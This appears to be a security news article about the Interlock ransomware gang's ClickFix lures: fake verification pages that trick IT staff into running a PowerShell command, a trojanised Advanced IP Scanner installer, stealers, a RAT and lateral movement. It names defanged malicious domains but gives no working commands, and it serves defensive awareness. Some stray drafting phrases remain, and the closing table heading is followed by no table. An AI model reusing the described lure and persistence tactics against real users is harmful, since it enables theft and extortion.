Ransomware Gang ‘Interlock’ Embraces Sneaky ClickFix Attacks to Hijack Corporate Systems

The Interlock ransomware gang has adopted a cunning new trick that’s catching victims off guard: impersonating IT tools to push malicious commands through something known as a ClickFix attack.

Researchers are sounding the alarm as these attacks steadily rise. The gang has now been confirmed to be using these lures to deploy their data-encrypting malware across both FreeBSD and Windows networks.

From Copy-Paste to Compromise

It starts innocently enough—an IT staffer sees a CAPTCHA screen or a tool verification page. It looks official. The next thing they know, a malicious PowerShell command has been copied to their clipboard.

Once that command is run? It’s game over.

The Interlock crew has been linked to at least four malicious URLs so far, all faking credibility:

• microsoft-msteams[.]com/additional-check.html

• microstteams[.]com/additional-check.html

• ecologilives[.]com/additional-check.html

• advanceipscaner[.]com/additional-check.html

Only one of them actually drops the infected installer, and it’s cleverly disguised as Advanced IP Scanner—a tool commonly used in IT departments.

What Happens Behind the Scenes

The moment that PowerShell command is executed, it downloads a 36MB file that acts as a two-faced payload.

On one hand, it installs what looks like a real version of Advanced IP Scanner. On the other, it runs a stealthy script buried within.

That hidden script? It gets right to work.

• Registers a Run key for persistence

• Grabs your OS version, running tasks, user privilege level

• Scans available drives and running processes

• Sends all that data back to a command-and-control server

There’s no pop-up, no red flags—just a browser tab showing the real tool’s website to throw off suspicion.

Payloads Get Personal

Different machines get different malware. Sekoia’s threat analysts noted several payloads coming from Interlock’s servers.

Some of the most commonly deployed ones include:

• LummaStealer – A notorious information stealer

• BerserkStealer – Another tool used to hoover up credentials

• Keyloggers – Your typing? Tracked

• Interlock RAT – A flexible trojan capable of doing everything from running shell commands to dropping malicious DLLs

This isn’t one-size-fits-all malware. It’s dynamic and adaptable. Whatever the machine lacks, the RAT fills in.

Lateral Moves and Final Hits

Once the RAT takes hold, things escalate. Interlock doesn’t just sit back—they move laterally through corporate networks.

RDP, PuTTY, AnyDesk, and LogMeIn have all been spotted in their toolkit. They hunt for credentials, map the environment, and quietly exfiltrate sensitive files before locking anything down.

Sometimes, the ransomware doesn’t even run right away.

Just one sentence: It’s set to run at 8 PM daily as a scheduled task.

Even worse, it filters by file extension, so it avoids double-encrypting already infected files. That’s not a bug; it’s a fallback, making sure the encryption happens even if something goes wrong earlier.

The Note That Hits Where It Hurts

The ransom note isn’t just a list of demands anymore.

Interlock’s latest version focuses less on technical threats and more on legal and regulatory nightmares. Think GDPR fines, SEC violations, shareholder panic.

It’s a psychological sledgehammer—pay up, or deal with lawsuits, lost trust, and maybe a public scandal.

The message has changed.

ClickFix Isn’t Just Interlock’s Toy Anymore

This isn’t just an Interlock issue. Other cybercriminal groups are jumping on the ClickFix bandwagon. Even the infamous Lazarus group from North Korea has joined the trend.

Just last month, Lazarus used the same trick targeting job seekers in crypto.

One sentence again: It’s working because it doesn’t feel like a scam—until it’s too late.

The ClickFix approach feels casual. There’s no scary pop-up. No noisy alert. Just a “verify here” prompt and a quick copy-paste.

By the time the victim realizes what happened, their files are locked, their credentials are stolen, and attackers are already digging through their network.

Table: Timeline of Interlock’s Known Attack Evolution